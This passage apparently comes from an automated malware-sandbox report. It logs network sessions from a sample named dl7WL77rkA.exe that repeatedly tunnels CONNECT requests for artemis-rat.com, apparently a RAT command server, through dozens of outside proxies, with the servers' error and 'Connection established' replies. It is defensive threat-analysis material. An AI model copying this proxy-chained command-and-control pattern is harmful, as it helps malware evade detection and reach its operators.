                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            322192.168.2.550892104.16.221.57803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.906733036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.064582109 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            323192.168.2.55088052.13.248.2931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.908911943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.492366076 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Content-Type: text/plain


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            324192.168.2.550779110.12.211.140803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.919148922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.234119892 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:34 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            325192.168.2.55080334.95.243.12280813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.919317007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.576708078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.893650055 CET59INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: nginx


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            326192.168.2.550131198.12.255.19393753876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.919994116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092413902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092999935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.201999903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            327192.168.2.551102202.159.30.94433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.923831940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
328192.168.2.551110202.159.30.94433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.925740004 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
329192.168.2.551116202.159.30.94433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.928585052 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
330192.168.2.551121202.159.30.94433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.930665016 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
331192.168.2.550913162.159.242.109803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.930706978 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.092463970 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
332192.168.2.55077779.101.55.161532813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.933480024 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.623655081 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.623701096 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.702356100 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
333192.168.2.550938104.25.167.88803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.935653925 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.089925051 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
334192.168.2.550921107.180.101.226353163876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.935656071 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
335192.168.2.55087923.152.40.1431283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.935722113 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:32:39.168452024 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:39.843703985 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:40.516115904 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:41.863364935 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:44.743750095 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:50.115781069 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:33:00.871052027 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:33:22.371907949 CET | 39 | IN | HTTP/1.1 200 Connection established


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
336192.168.2.55088138.162.28.21831283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.936075926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.372890949 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            337192.168.2.550955172.67.182.145803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.943427086 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.098802090 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            338192.168.2.550815121.41.66.24280813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.965590000 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.295854092 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            339192.168.2.550977172.67.150.173803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.966319084 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.124236107 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            340192.168.2.550967172.67.181.17803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.968657970 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.127374887 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            341192.168.2.550958104.17.16.87803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.968660116 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.126929998 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            342192.168.2.550800171.247.244.10310803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.969238997 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            343192.168.2.55094012.186.205.121803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.969985008 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            344192.168.2.550849195.25.20.10831283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.972460985 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.289763927 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            345192.168.2.550818103.23.101.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.979985952 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            346192.168.2.55081643.128.107.25188883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.984745026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.335746050 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            347192.168.2.55118541.86.252.914433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.989115953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            348192.168.2.55118941.86.252.914433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.990921974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            349192.168.2.550114203.96.177.211550053876C:\Users\user\Desktop\dl7WL77rkA.exe
